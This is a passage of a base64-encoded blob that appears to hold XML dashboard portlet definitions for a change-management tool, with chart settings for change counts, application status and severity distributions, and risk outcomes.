YnVpbHRJbj5mYWxzZTwvYnVpbHRJbj48ZGVwZW5kZW50VXVpZD41ODZkYzU4YWY0OWUyZjRlOmZmOTgwNToxMGE2MDgxMzAzNzotN2ZmYzwvZGVwZW5kZW50VXVpZD48L1BvcnRsZXREZWZpbml0aW9uPjxQb3J0bGV0RGVmaW5pdGlvbj48TGluZUNoYXJ0UG9ydGxldERlZmluaXRpb24+PENoYXJ0UG9ydGxldERlZmluaXRpb24+PEJ1aWxkZXJQb3J0bGV0RGVmaW5pdGlvbj48ZGF0YVNvdXJjZT48aWQ+Q0hBTkdFX09WRVJfVElNRV9EQVRBX1NPVVJDRTwvaWQ+PG5hbWU+Q2hhbmdlcyBPdmVyIFRpbWU8L25hbWU+PC9kYXRhU291cmNlPjxwcmVmZXJlbmNlU3VtbWFyeVNob3duPnRydWU8L3ByZWZlcmVuY2VTdW1tYXJ5U2hvd24+PHJlcXVpcmVFZGl0QmVmb3JlRmlyc3RWaWV3PmZhbHNlPC9yZXF1aXJlRWRpdEJlZm9yZUZpcnN0Vmlldz48aGVscFRleHQvPjxwcmVmZXJlbmNlPjxuYW1lPkZpbHRlcjwvbmFtZT48dHlwZT5kcm9wZG93bjwvdHlwZT48cHJvbXB0PkZpbHRlcjo8L3Byb21wdD48bGF5b3V0Um93PjA8L2xheW91dFJvdz48bGF5b3V0Q29sdW1uPjA8L2xheW91dENvbHVtbj48bGF5b3V0V2lkdGg+MTwvbGF5b3V0V2lkdGg+PGRlZmF1bHRWYWx1ZS8+PGRpc3BsYXlPcHRpb24+cmVxdWlyZWRFZGl0YWJsZVByZWY8L2Rpc3BsYXlPcHRpb24+PC9wcmVmZXJlbmNlPjxwcmVmZXJlbmNlPjxuYW1lPkdyb3VwIEJ5PC9uYW1lPjx0eXBlPmRyb3Bkb3duPC90eXBlPjxwcm9tcHQ+R3JvdXAgQnk6PC9wcm9tcHQ+PGxheW91dFJvdz4wPC9sYXlvdXRSb3c+PGxheW91dENvbHVtbj4xPC9sYXlvdXRDb2x1bW4+PGxheW91dFdpZHRoPjE8L2xheW91dFdpZHRoPjxkZWZhdWx0VmFsdWU+W3dlZWtdW1dlZWtdPC9kZWZhdWx0VmFsdWU+PGRpc3BsYXlPcHRpb24+cmVxdWlyZWRFZGl0YWJsZVByZWY8L2Rpc3BsYXlPcHRpb24+PC9wcmVmZXJlbmNlPjwvQnVpbGRlclBvcnRsZXREZWZpbml0aW9uPjxjaGFydFRpdGxlPkNoYW5nZXMgT3ZlciBUaW1lPC9jaGFydFRpdGxlPjxjb2xvclNvdXJjZS8+PHRvb2x0aXBTb3VyY2U+Q291bnQ8L3Rvb2x0aXBTb3VyY2U+PHRvb2x0aXBDb250YWluc0hUTUw+ZmFsc2U8L3Rvb2x0aXBDb250YWluc0hUTUw+PG9yaWVudGF0aW9uLz48aHlwZXJsaW5rPjxoeXBlcmxpbmtUeXBlPm5vSHlwZXJsaW5rPC9oeXBlcmxpbmtUeXBlPjxoeXBlcmxpbmtTb3VyY2UvPjwvaHlwZXJsaW5rPjwvQ2hhcnRQb3J0bGV0RGVmaW5pdGlvbj48eEF4aXNTb3VyY2U+UGxhbm5pbmcgU3RhcnQgVGltZTwveEF4aXNTb3VyY2U+PHhBeGlzTGFiZWw+UGxhbm5pbmcgU3RhcnQgVGltZTwveEF4aXNMYWJlbD48eUF4aXNTb3VyY2U+Q291bnQ8L3lBeGlzU291cmNlPjx5QXhpc0xhYmVsPkNvdW50PC95QXhpc0xhYmVsPjxzZXJpZXNTb3VyY2U+TGluZSBMYWJlbDwvc2VyaWVzU291cmNlPjxzZXJpZXNMYWJlbD5DaGFuZ2VzPC9zZXJpZXNMYWJlbD48L0xpbmVDaGFydFBvcnRsZXREZWZpbml0aW9uPjx0eXBlPkxpbmVDaGFydDwvdHlwZT48bmFtZT5DaGFuZ2VzIE92ZXIgVGltZTwvbmFtZT48dXVpZD4zMjljODEyYzUxNzgzZTllOjZhOTUyMGYzOjExNjM5ODE3ZGEyOi03ZmVjPC91dWlkPjxkZXNjcmlwdGlvbi8+PHRpbWVvdXQ+MjA8L3RpbWVvdXQ+PGRlZmF1bHRXaWR0aD4xPC9kZWZhdWx0V2lkdGg+PGVuYWJsZWQ+dHJ1ZTwvZW5hYmxlZD48ZXhwb3J0QXNXU1JQPmZhbHNlPC9leHBvcnRBc1dTUlA+PHN1cHBvcnREcmlsbFRvPnRydWU8L3N1cHBvcnREcmlsbFRvPjxwb3J0bGV0Q29tbVN1cD5mYWxzZTwvcG9ydGxldENvbW1TdXA+PGJ1aWx0SW4+ZmFsc2U8L2J1aWx0SW4+PGRlcGVuZGVudFV1aWQ+NTg2ZGM1OGFmNDllMmY0ZTpmZjk4MDU6MTBhNjA4MTMwMzc6LTdmZmM8L2RlcGVuZGVudFV1aWQ+PC9Qb3J0bGV0RGVmaW5pdGlvbj48UG9ydGxldERlZmluaXRpb24+PE11bHRpQmFyQ2hhcnRQb3J0bGV0RGVmaW5pdGlvbj48Q2hhcnRQb3J0bGV0RGVmaW5pdGlvbj48QnVpbGRlclBvcnRsZXREZWZpbml0aW9uPjxkYXRhU291cmNlPjxpZD5BUFBMSUNBVElPTl9TVEFUVVNfRElTVFJJQlVUSU9OPC9pZD48bmFtZT5CdXNpbmVzcyBDSSBTdGF0dXMgRGlzdHJpYnV0aW9uPC9uYW1lPjwvZGF0YVNvdXJjZT48cHJlZmVyZW5jZVN1bW1hcnlTaG93bj50cnVlPC9wcmVmZXJlbmNlU3VtbWFyeVNob3duPjxyZXF1aXJlRWRpdEJlZm9yZUZpcnN0Vmlldz5mYWxzZTwvcmVxdWlyZUVkaXRCZWZvcmVGaXJzdFZpZXc+PGhlbHBUZXh0Lz48cHJlZmVyZW5jZT48bmFtZT5Vc2VyIEFwcGxpY2F0aW9uczwvbmFtZT48dHlwZT55ZXNObzwvdHlwZT48cHJvbXB0PlNob3cgT25seSBVc2VyIEFwcGxpY2F0aW9uczwvcHJvbXB0PjxsYXlvdXRSb3c+MDwvbGF5b3V0Um93PjxsYXlvdXRDb2x1bW4+MTwvbGF5b3V0Q29sdW1uPjxsYXlvdXRXaWR0aD4xPC9sYXlvdXRXaWR0aD48ZGVmYXVsdFZhbHVlPltZXVtZZXNdPC9kZWZhdWx0VmFsdWU+PGRpc3BsYXlPcHRpb24+ZWRpdGFibGVQcmVmPC9kaXNwbGF5T3B0aW9uPjwvcHJlZmVyZW5jZT48cHJlZmVyZW5jZT48bmFtZT5UaW1lIEZyYW1lPC9uYW1lPjx0eXBlPmRyb3Bkb3duPC90eXBlPjxwcm9tcHQ+Q3JlYXRlZCBXaXRoaW48L3Byb21wdD48bGF5b3V0Um93PjA8L2xheW91dFJvdz48bGF5b3V0Q29sdW1uPjA8L2xheW91dENvbHVtbj48bGF5b3V0V2lkdGg+MTwvbGF5b3V0V2lkdGg+PGRlZmF1bHRWYWx1ZT5bTGFzdCBNb250aF1bTGFzdCBNb250aF08L2RlZmF1bHRWYWx1ZT48ZGlzcGxheU9wdGlvbj5yZXF1aXJlZEVkaXRhYmxlUHJlZjwvZGlzcGxheU9wdGlvbj48L3ByZWZlcmVuY2U+PC9CdWlsZGVyUG9ydGxldERlZmluaXRpb24+PGNoYXJ0VGl0bGU+QXBwbGljYXRpb24gU3RhdHVzIERpc3RyaWJ1dGlvbjwvY2hhcnRUaXRsZT48Y29sb3JTb3VyY2UvPjx0b29sdGlwU291cmNlPiMgUmVxdWVzdHM8L3Rvb2x0aXBTb3VyY2U+PHRvb2x0aXBDb250YWluc0hUTUw+ZmFsc2U8L3Rvb2x0aXBDb250YWluc0hUTUw+PG9yaWVudGF0aW9uPnZlcnRpY2FsPC9vcmllbnRhdGlvbj48aHlwZXJsaW5rPjxoeXBlcmxpbmtUeXBlPm5vSHlwZXJsaW5rPC9oeXBlcmxpbmtUeXBlPjxoeXBlcmxpbmtTb3VyY2UvPjwvaHlwZXJsaW5rPjwvQ2hhcnRQb3J0bGV0RGVmaW5pdGlvbj48YmFyTmFtZVNvdXJjZT5JbXBhY3RlZCBBcHBsaWNhdGlvbjwvYmFyTmFtZVNvdXJjZT48YmFyQXhpc0xhYmVsPkltcGFjdGVkIEFwcGxpY2F0aW9uPC9iYXJBeGlzTGFiZWw+PHZhbHVlU291cmNlPiMgUmVxdWVzdHM8L3ZhbHVlU291cmNlPjx2YWx1ZUF4aXNMYWJlbD4jIFJlcXVlc3RzPC92YWx1ZUF4aXNMYWJlbD48c2VyaWVzU291cmNlPlN0YXR1czwvc2VyaWVzU291cmNlPjxzZXJpZXNMYWJlbD5TdGF0dXM8L3Nlcmllc0xhYmVsPjwvTXVsdGlCYXJDaGFydFBvcnRsZXREZWZpbml0aW9uPjx0eXBlPkNsdXN0ZXJlZEJhckNoYXJ0PC90eXBlPjxuYW1lPkFwcGxpY2F0aW9uIFN0YXR1cyBEaXN0cmlidXRpb248L25hbWU+PHV1aWQ+NTg2ZGM1OGFmNDllMmY0ZTpmZjk4MDU6MTBhNjA4MTMwMzc6LTdmZmY8L3V1aWQ+PGRlc2NyaXB0aW9uLz48dGltZW91dD4yMDwvdGltZW91dD48ZGVmYXVsdFdpZHRoPjI8L2RlZmF1bHRXaWR0aD48ZW5hYmxlZD50cnVlPC9lbmFibGVkPjxleHBvcnRBc1dTUlA+dHJ1ZTwvZXhwb3J0QXNXU1JQPjxzdXBwb3J0RHJpbGxUbz50cnVlPC9zdXBwb3J0RHJpbGxUbz48cG9ydGxldENvbW1TdXA+ZmFsc2U8L3BvcnRsZXRDb21tU3VwPjxidWlsdEluPmZhbHNlPC9idWlsdEluPjxkZXBlbmRlbnRVdWlkPjU4NmRjNThhZjQ5ZTJmNGU6ZmY5ODA1OjEwYTYwODEzMDM3Oi03ZmZjPC9kZXBlbmRlbnRVdWlkPjwvUG9ydGxldERlZmluaXRpb24+PFBvcnRsZXREZWZpbml0aW9uPjxMaW5lQ2hhcnRQb3J0bGV0RGVmaW5pdGlvbj48Q2hhcnRQb3J0bGV0RGVmaW5pdGlvbj48QnVpbGRlclBvcnRsZXREZWZpbml0aW9uPjxkYXRhU291cmNlPjxpZD5DSEFOR0VfT1ZFUl9USU1FX0RBVEFfU09VUkNFPC9pZD48bmFtZT5DaGFuZ2VzIE92ZXIgVGltZTwvbmFtZT48L2RhdGFTb3VyY2U+PHByZWZlcmVuY2VTdW1tYXJ5U2hvd24+dHJ1ZTwvcHJlZmVyZW5jZVN1bW1hcnlTaG93bj48cmVxdWlyZUVkaXRCZWZvcmVGaXJzdFZpZXc+ZmFsc2U8L3JlcXVpcmVFZGl0QmVmb3JlRmlyc3RWaWV3PjxoZWxwVGV4dC8+PHByZWZlcmVuY2U+PG5hbWU+R3JvdXAgQnk8L25hbWU+PHR5cGU+ZHJvcGRvd248L3R5cGU+PHByb21wdD5Hcm91cCBCeTo8L3Byb21wdD48bGF5b3V0Um93PjA8L2xheW91dFJvdz48bGF5b3V0Q29sdW1uPjE8L2xheW91dENvbHVtbj48bGF5b3V0V2lkdGg+MTwvbGF5b3V0V2lkdGg+PGRlZmF1bHRWYWx1ZT5bd2Vla11bV2Vla108L2RlZmF1bHRWYWx1ZT48ZGlzcGxheU9wdGlvbj5yZXF1aXJlZEVkaXRhYmxlUHJlZjwvZGlzcGxheU9wdGlvbj48L3ByZWZlcmVuY2U+PHByZWZlcmVuY2U+PG5hbWU+RmlsdGVyPC9uYW1lPjx0eXBlPmRyb3Bkb3duPC90eXBlPjxwcm9tcHQ+RmlsdGVyOjwvcHJvbXB0PjxsYXlvdXRSb3c+MDwvbGF5b3V0Um93PjxsYXlvdXRDb2x1bW4+MDwvbGF5b3V0Q29sdW1uPjxsYXlvdXRXaWR0aD4xPC9sYXlvdXRXaWR0aD48ZGVmYXVsdFZhbHVlPlsyOTQ5MThdW0xhdGVudF08L2RlZmF1bHRWYWx1ZT48ZGlzcGxheU9wdGlvbj5yZXF1aXJlZEVkaXRhYmxlUHJlZjwvZGlzcGxheU9wdGlvbj48L3ByZWZlcmVuY2U+PC9CdWlsZGVyUG9ydGxldERlZmluaXRpb24+PGNoYXJ0VGl0bGU+TGF0ZW50IENoYW5nZXMgT3ZlciBUaW1lPC9jaGFydFRpdGxlPjxjb2xvclNvdXJjZS8+PHRvb2x0aXBTb3VyY2U+Q291bnQ8L3Rvb2x0aXBTb3VyY2U+PHRvb2x0aXBDb250YWluc0hUTUw+ZmFsc2U8L3Rvb2x0aXBDb250YWluc0hUTUw+PG9yaWVudGF0aW9uLz48aHlwZXJsaW5rPjxoeXBlcmxpbmtUeXBlPm5vSHlwZXJsaW5rPC9oeXBlcmxpbmtUeXBlPjxoeXBlcmxpbmtTb3VyY2UvPjwvaHlwZXJsaW5rPjwvQ2hhcnRQb3J0bGV0RGVmaW5pdGlvbj48eEF4aXNTb3VyY2U+UGxhbm5pbmcgU3RhcnQgVGltZTwveEF4aXNTb3VyY2U+PHhBeGlzTGFiZWw+UGxhbm5pbmcgU3RhcnQgVGltZTwveEF4aXNMYWJlbD48eUF4aXNTb3VyY2U+Q291bnQ8L3lBeGlzU291cmNlPjx5QXhpc0xhYmVsPkNvdW50PC95QXhpc0xhYmVsPjxzZXJpZXNTb3VyY2U+TGluZSBMYWJlbDwvc2VyaWVzU291cmNlPjxzZXJpZXNMYWJlbD5MYXRlbnQgQ2hhbmdlczwvc2VyaWVzTGFiZWw+PC9MaW5lQ2hhcnRQb3J0bGV0RGVmaW5pdGlvbj48dHlwZT5MaW5lQ2hhcnQ8L3R5cGU+PG5hbWU+TGF0ZW50IENoYW5nZXMgT3ZlciBUaW1lPC9uYW1lPjx1dWlkPjNiN2JiNmFhMDI5NzdmNWM6Njk0MDIxMGI6MTE2M2JjYjM5NGE6LTdmZGY8L3V1aWQ+PGRlc2NyaXB0aW9uLz48dGltZW91dD4yMDwvdGltZW91dD48ZGVmYXVsdFdpZHRoPjE8L2RlZmF1bHRXaWR0aD48ZW5hYmxlZD50cnVlPC9lbmFibGVkPjxleHBvcnRBc1dTUlA+ZmFsc2U8L2V4cG9ydEFzV1NSUD48c3VwcG9ydERyaWxsVG8+dHJ1ZTwvc3VwcG9ydERyaWxsVG8+PHBvcnRsZXRDb21tU3VwPmZhbHNlPC9wb3J0bGV0Q29tbVN1cD48YnVpbHRJbj5mYWxzZTwvYnVpbHRJbj48ZGVwZW5kZW50VXVpZD41ODZkYzU4YWY0OWUyZjRlOmZmOTgwNToxMGE2MDgxMzAzNzotN2ZmYzwvZGVwZW5kZW50VXVpZD48L1BvcnRsZXREZWZpbml0aW9uPjxQb3J0bGV0RGVmaW5pdGlvbj48TXVsdGlCYXJDaGFydFBvcnRsZXREZWZpbml0aW9uPjxDaGFydFBvcnRsZXREZWZpbml0aW9uPjxCdWlsZGVyUG9ydGxldERlZmluaXRpb24+PGRhdGFTb3VyY2U+PGlkPk9VVENPTUVfR1JPVVBCWV9OVU1FUklDX0ZJRUxEX0RBVEFfU09VUkNFPC9pZD48bmFtZT5PdXRjb21lIEdyb3VwIGJ5IE51bWVyaWMgRmllbGQ8L25hbWU+PC9kYXRhU291cmNlPjxwcmVmZXJlbmNlU3VtbWFyeVNob3duPnRydWU8L3ByZWZlcmVuY2VTdW1tYXJ5U2hvd24+PHJlcXVpcmVFZGl0QmVmb3JlRmlyc3RWaWV3PmZhbHNlPC9yZXF1aXJlRWRpdEJlZm9yZUZpcnN0Vmlldz48aGVscFRleHQvPjxwcmVmZXJlbmNlPjxuYW1lPk1heGltdW0gVmFsdWU8L25hbWU+PHR5cGU+dGV4dDwvdHlwZT48cHJvbXB0Pk1heGltdW0gVmFsdWU6PC9wcm9tcHQ+PGxheW91dFJvdz4zPC9sYXlvdXRSb3c+PGxheW91dENvbHVtbj4wPC9sYXlvdXRDb2x1bW4+PGxheW91dFdpZHRoPjI8L2xheW91dFdpZHRoPjxkZWZhdWx0VmFsdWU+WzEwMF1bXTwvZGVmYXVsdFZhbHVlPjxkaXNwbGF5T3B0aW9uPnJlcXVpcmVkRWRpdGFibGVQcmVmPC9kaXNwbGF5T3B0aW9uPjwvcHJlZmVyZW5jZT48cHJlZmVyZW5jZT48bmFtZT5NaW5pbXVuIFZhbHVlPC9uYW1lPjx0eXBlPnRleHQ8L3R5cGU+PHByb21wdD5NaW5pbXVuIFZhbHVlOjwvcHJvbXB0PjxsYXlvdXRSb3c+MjwvbGF5b3V0Um93PjxsYXlvdXRDb2x1bW4+MDwvbGF5b3V0Q29sdW1uPjxsYXlvdXRXaWR0aD4yPC9sYXlvdXRXaWR0aD48ZGVmYXVsdFZhbHVlPlswXVtdPC9kZWZhdWx0VmFsdWU+PGRpc3BsYXlPcHRpb24+cmVxdWlyZWRFZGl0YWJsZVByZWY8L2Rpc3BsYXlPcHRpb24+PC9wcmVmZXJlbmNlPjxwcmVmZXJlbmNlPjxuYW1lPkludGVydmFsPC9uYW1lPjx0eXBlPnRleHQ8L3R5cGU+PHByb21wdD5JbnRlcnZhbDo8L3Byb21wdD48bGF5b3V0Um93PjQ8L2xheW91dFJvdz48bGF5b3V0Q29sdW1uPjA8L2xheW91dENvbHVtbj48bGF5b3V0V2lkdGg+MjwvbGF5b3V0V2lkdGg+PGRlZmF1bHRWYWx1ZT5bMTBdW108L2RlZmF1bHRWYWx1ZT48ZGlzcGxheU9wdGlvbj5yZXF1aXJlZEVkaXRhYmxlUHJlZjwvZGlzcGxheU9wdGlvbj48L3ByZWZlcmVuY2U+PHByZWZlcmVuY2U+PG5hbWU+RmlsdGVyPC9uYW1lPjx0eXBlPmRyb3Bkb3duPC90eXBlPjxwcm9tcHQ+RmlsdGVyOjwvcHJvbXB0PjxsYXlvdXRSb3c+MDwvbGF5b3V0Um93PjxsYXlvdXRDb2x1bW4+MDwvbGF5b3V0Q29sdW1uPjxsYXlvdXRXaWR0aD4yPC9sYXlvdXRXaWR0aD48ZGVmYXVsdFZhbHVlLz48ZGlzcGxheU9wdGlvbj5yZXF1aXJlZEVkaXRhYmxlUHJlZjwvZGlzcGxheU9wdGlvbj48L3ByZWZlcmVuY2U+PHByZWZlcmVuY2U+PG5hbWU+TnVtZXJpYyBUeXBlPC9uYW1lPjx0eXBlPmRyb3Bkb3duPC90eXBlPjxwcm9tcHQ+TnVtZXJpYyBUeXBlOjwvcHJvbXB0PjxsYXlvdXRSb3c+MTwvbGF5b3V0Um93PjxsYXlvdXRDb2x1bW4+MDwvbGF5b3V0Q29sdW1uPjxsYXlvdXRXaWR0aD4yPC9sYXlvdXRXaWR0aD48ZGVmYXVsdFZhbHVlPltjYWxjdWxhdGVkLXJpc2tdW2NhbGN1bGF0ZWQtcmlza108L2RlZmF1bHRWYWx1ZT48ZGlzcGxheU9wdGlvbj5yZXF1aXJlZEVkaXRhYmxlUHJlZjwvZGlzcGxheU9wdGlvbj48L3ByZWZlcmVuY2U+PC9CdWlsZGVyUG9ydGxldERlZmluaXRpb24+PGNoYXJ0VGl0bGU+T3V0Y29tZSBHcm91cCBCeSBSaXNrPC9jaGFydFRpdGxlPjxjb2xvclNvdXJjZT5Db2xvcjwvY29sb3JTb3VyY2U+PHRvb2x0aXBTb3VyY2U+VG9vbHRpcDwvdG9vbHRpcFNvdXJjZT48dG9vbHRpcENvbnRhaW5zSFRNTD5mYWxzZTwvdG9vbHRpcENvbnRhaW5zSFRNTD48b3JpZW50YXRpb24+dmVydGljYWw8L29yaWVudGF0aW9uPjxoeXBlcmxpbms+PGh5cGVybGlua1R5cGU+bm9IeXBlcmxpbms8L2h5cGVybGlua1R5cGU+PGh5cGVybGlua1NvdXJjZS8+PC9oeXBlcmxpbms+PC9DaGFydFBvcnRsZXREZWZpbml0aW9uPjxiYXJOYW1lU291cmNlPkZpZWxkPC9iYXJOYW1lU291cmNlPjxiYXJBeGlzTGFiZWw+UmlzazwvYmFyQXhpc0xhYmVsPjx2YWx1ZVNvdXJjZT5QZXJjZW50YWdlPC92YWx1ZVNvdXJjZT48dmFsdWVBeGlzTGFiZWw+UGVyY2VudGFnZTwvdmFsdWVBeGlzTGFiZWw+PHNlcmllc1NvdXJjZT5PdXRjb21lPC9zZXJpZXNTb3VyY2U+PHNlcmllc0xhYmVsPk91dGNvbWU8L3Nlcmllc0xhYmVsPjwvTXVsdGlCYXJDaGFydFBvcnRsZXREZWZpbml0aW9uPjx0eXBlPkNsdXN0ZXJlZEJhckNoYXJ0PC90eXBlPjxuYW1lPk91dGNvbWUgR3JvdXBlZCBCeSBSaXNrPC9uYW1lPjx1dWlkPjZhMzY3M2M5ZmViNzZkY2I6LTUxOTcwOGNjOjExNzJiYTU3OWVkOi03ZmYxPC91dWlkPjxkZXNjcmlwdGlvbi8+PHRpbWVvdXQ+MjA8L3RpbWVvdXQ+PGRlZmF1bHRXaWR0aD4xPC9kZWZhdWx0V2lkdGg+PGVuYWJsZWQ+dHJ1ZTwvZW5hYmxlZD48ZXhwb3J0QXNXU1JQPmZhbHNlPC9leHBvcnRBc1dTUlA+PHN1cHBvcnREcmlsbFRvPnRydWU8L3N1cHBvcnREcmlsbFRvPjxwb3J0bGV0Q29tbVN1cD5mYWxzZTwvcG9ydGxldENvbW1TdXA+PGJ1aWx0SW4+ZmFsc2U8L2J1aWx0SW4+PGRlcGVuZGVudFV1aWQ+NTg2ZGM1OGFmNDllMmY0ZTpmZjk4MDU6MTBhNjA4MTMwMzc6LTdmZmM8L2RlcGVuZGVudFV1aWQ+PC9Qb3J0bGV0RGVmaW5pdGlvbj48UG9ydGxldERlZmluaXRpb24+PE11bHRpQmFyQ2hhcnRQb3J0bGV0RGVmaW5pdGlvbj48Q2hhcnRQb3J0bGV0RGVmaW5pdGlvbj48QnVpbGRlclBvcnRsZXREZWZpbml0aW9uPjxkYXRhU291cmNlPjxpZD5BUFBMSUNBVElPTl9TRVZFUklUWV9ESVNUUklCVVRJT048L2lkPjxuYW1lPkJ1c2luZXNzIENJIFNldmVyaXR5IERpc3RyaWJ1dGlvbjwvbmFtZT48L2RhdGFTb3VyY2U+PHByZWZlcmVuY2VTdW1tYXJ5U2hvd24+dHJ1ZTwvcHJlZmVyZW5jZVN1bW1hcnlTaG93bj48cmVxdWlyZUVkaXRCZWZvcmVGaXJzdFZpZXc+ZmFsc2U8L3JlcXVpcmVFZGl0QmVmb3JlRmlyc3RWaWV3PjxoZWxwVGV4dC8+PHByZWZlcmVuY2U+PG5hbWU+VXNlciBBcHBsaWNhdGlvbnM8L25hbWU+PHR5cGU+eWVzTm88L3R5cGU+PHByb21wdD5TaG93IE9ubHkgVXNlciBBcHBsaWNhdGlvbnM8L3Byb21wdD48bGF5b3V0Um93PjA8L2xheW91dFJvdz48bGF5b3V0Q29sdW1uPjA8L2xheW91dENvbHVtbj48bGF5b3V0V2lkdGg+MTwvbGF5b3V0V2lkdGg+PGRlZmF1bHRWYWx1ZT5bWV1bWWVzXTwvZGVmYXVsdFZhbHVlPjxkaXNwbGF5T3B0aW9uPmVkaXRhYmxlUHJlZjwvZGlzcGxheU9wdGlvbj48L3ByZWZlcmVuY2U+PHByZWZlcmVuY2U+PG5hbWU+UmVxdWVzdCBTdGF0dXM8L25hbWU+PHR5cGU+ZHJvcGRvd248L3R5cGU+PHByb21wdD5SZXF1ZXN0IFN0YXR1czwvcHJvbXB0PjxsYXlvdXRSb3c+MDwvbGF5b3V0Um93PjxsYXlvdXRDb2x1bW4+MTwvbGF5b3V0Q29sdW1uPjxsYXlvdXRXaWR0aD4xPC9sYXlvdXRXaWR0aD48ZGVmYXVsdFZhbHVlPltQRU5ESU5HX0FQUFJPVkFMXVtQZW5kaW5nCgkJCQkJCQlBcHByb3ZhbF08L2RlZmF1bHRWYWx1ZT48ZGlzcGxheU9wdGlvbj5yZXF1aXJlZEVkaXRhYmxlUHJlZjwvZGlzcGxheU9wdGlvbj48L3ByZWZlcmVuY2U+PC9CdWlsZGVyUG9ydGxldERlZmluaXRpb24+PGNoYXJ0VGl0bGU+QXBwbGljYXRpb24gU2V2ZXJpdHkgRGlzdHJpYnV0aW9uPC9jaGFydFRpdGxlPjxjb2xvclNvdXJjZT5TZXZlcml0eSBDb2xvcnM8L2NvbG9yU291cmNlPjx0b29sdGlwU291cmNlPiMgUmVxdWVzdHM8L3Rvb2x0aXBTb3VyY2U+PHRvb2x0aXBDb250YWluc0hUTUw+ZmFsc2U8L3Rvb2x0aXBDb250YWluc0hUTUw+PG9yaWVudGF0aW9uPnZlcnRpY2FsPC9vcmllbnRhdGlvbj48aHlwZXJsaW5rPjxoeXBlcmxpbmtUeXBlPm5vSHlwZXJsaW5rPC9oeXBlcmxpbmtUeXBlPjxoeXBlcmxpbmtTb3VyY2UvPjwvaHlwZXJsaW5rPjwvQ2hhcnRQb3J0bGV0RGVmaW5pdGlvbj48YmFyTmFtZVNvdXJjZT5JbXBhY3RlZCBBcHBsaWNhdGlvbjwvYmFyTmFtZVNvdXJjZT48YmFyQXhpc0xhYmVsPkltcGFjdGVkIEFwcGxpY2F0aW9uPC9iYXJBeGlzTGFiZWw+PHZhbHVlU291cmNlPiMgUmVxdWVzdHM8L3ZhbHVlU291cmNlPjx2YWx1ZUF4aXNMYWJlbD4jIFJlcXVlc3RzPC92YWx1ZUF4aXNMYWJlbD48c2VyaWVzU291cmNlPlNldmVyaXR5PC9zZXJpZXNTb3VyY2U+PHNlcmllc0xhYmVsPlNldmVyaXR5PC9zZXJpZXNMYWJlbD48L011bHRpQmFyQ2hhcnRQb3J0bGV0RGVmaW5pdGlvbj48dHlwZT5DbHVzdGVyZWRCYXJDaGFydDwvdHlwZT48bmFtZT5BcHBsaWNhdGlvbiBTZXZlcml0eSBEaXN0cmlidXRpb248L25hbWU+PHV1aWQ+NTg2ZGM1OGFmNDllMmY0ZTpmZjk4MDU6MTBhNjA4MTMwMzc6LTgwMDA8L3V1aWQ+PGRlc2NyaXB0aW9uLz48dGltZW91dD4yMDwvdGltZW91dD48ZGVmYXVsdFdpZHRoPjI8L2RlZmF1bHRXaWR0aD48ZW5hYmxlZD50cnVlPC9lbmFibGVkPjxleHBvcnRBc1dTUlA+dHJ1ZTwvZXhwb3J0QXNXU1JQPjxzdXBwb3J0RHJpbGxUbz50cnVlPC9zdXBwb3J0RHJpbGxUbz48cG9ydGxldENvbW1TdXA+ZmFsc2U8L3BvcnRsZXRDb21tU3VwPjxidWlsdEluPmZhbHNlPC9idWlsdEluPjxkZXBlbmRlbnRVdWlkPjU4NmRjNThhZjQ5ZTJmNGU6ZmY5ODA1OjEwYTYwODEzMDM3Oi03ZmZjPC9kZXBlbmRlbnRVdWlkPjwvUG9ydGxldERlZmluaXRpb24+PFBvcnRsZXREZWZpbml0aW9uPjxMaW5lQ2hhcnRQb3J0bGV0RGVmaW5pdGlvbj48Q2hhcnRQb3J0bGV0RGVmaW5pdGlvbj48QnVpbGRlclBvcnRsZXREZWZpbml0aW9uPjxkYXRhU291cmNlPjxpZD5BQk5PUk1BTF9DSEFOR0VfT1ZFUl9USU1FX0RBVEFfU09VUkNFPC9pZD48bmFtZT5BYm5vcm1hbCBDaGFuZ2VzIE92ZXIgVGltZTwvbmFtZT48L2RhdGFTb3VyY2U+PHByZWZlcmVuY2VTdW1tYXJ5U2hvd24+dHJ1ZTwvcHJlZmVyZW5jZVN1bW1hcnlTaG93bj48cmVxdWlyZUVkaXRCZWZvcmVGaXJzdFZpZXc+ZmFsc2U8L3JlcXVpcmVFZGl0QmVmb3JlRmlyc3RWaWV3PjxoZWxwVGV4dC8+PHByZWZlcmVuY2U+PG5hbWU+R3JvdXAgQnk8L25hbWU+PHR5cGU+ZHJvcGRvd248L3R5cGU+PHByb21wdD5Hcm91cCBCeTo8L3Byb21wdD48bGF5b3V0Um93PjA8L2xheW91dFJvdz48bGF5b3V0Q29sdW1uPjE8L2xheW91dENvbHVtbj48bGF5b3V0V2lkdGg+MTwvbGF5b3V0V2lkdGg+PGRlZmF1bHRWYWx1ZT5bd2Vla11bV2Vla108L2RlZmF1bHRWYWx1ZT48ZGlzcGxheU9wdGlvbj5yZXF1aXJlZEVkaXRhYmxlUHJlZjwvZGlzcGxheU9wdGlvbj48L3ByZWZlcmVuY2U+PHByZWZlcmVuY2U+PG5hbWU+RmlsdGVyPC9uYW1lPjx0eXBlPmRyb3Bkb3duPC90eXBlPjxwcm9tcHQ+RmlsdGVyOjwvcHJvbXB0PjxsYXlvdXRSb3c+MDwvbGF5b3V0Um93PjxsYXlvdXRDb2x1bW4+MDwvbGF5b3V0Q29sdW1uPjxsYXlvdXRXaWR0aD4xPC9sYXlvdXRXaWR0aD48ZGVmYXVsdFZhbHVlLz48ZGlzcGxheU9wdGlvbj5yZXF1aXJlZEVkaXRhYmxlUHJlZjwvZGlzcGxheU9wdGlvbj48L3ByZWZlcmVuY2U+PC9CdWlsZGVyUG9ydGxldERlZmluaXRpb24+PGNoYXJ0VGl0bGU+QWJub3JtYWwgQ2hhbmdlcyBPdmVyIFRpbWU8L2NoYXJ0VGl0bGU+PGNvbG9yU291cmNlLz48dG9vbHRpcFNvdXJjZT5Db3VudDwvdG9vbHRpcFNvdXJjZT48dG9vbHRpcENvbnRhaW5zSFRNTD5mYWxzZTwvdG9vbHRpcENvbnRhaW5zSFRNTD48b3JpZW50YXRpb24vPjxoeXBlcmxpbms+PGh5cGVybGlua1R5cGU+bm9IeXBlcmxpbms8L2h5cGVybGlua1R5cGU+PGh5cGVybGlua1NvdXJjZS8+PC9oeXBlcmxpbms+PC9DaGFydFBvcnRsZXREZWZpbml0aW9uPjx4QXhpc1NvdXJjZT5QbGFubmluZyBTdGFydCBUaW1lPC94QXhpc1NvdXJjZT48eEF4aXNMYWJlbD5QbGFubmluZyBTdGFydCBUaW1lPC94QXhpc0xhYmVsPjx5QXhpc1NvdXJjZT5Db3VudDwveUF4aXNTb3VyY2U+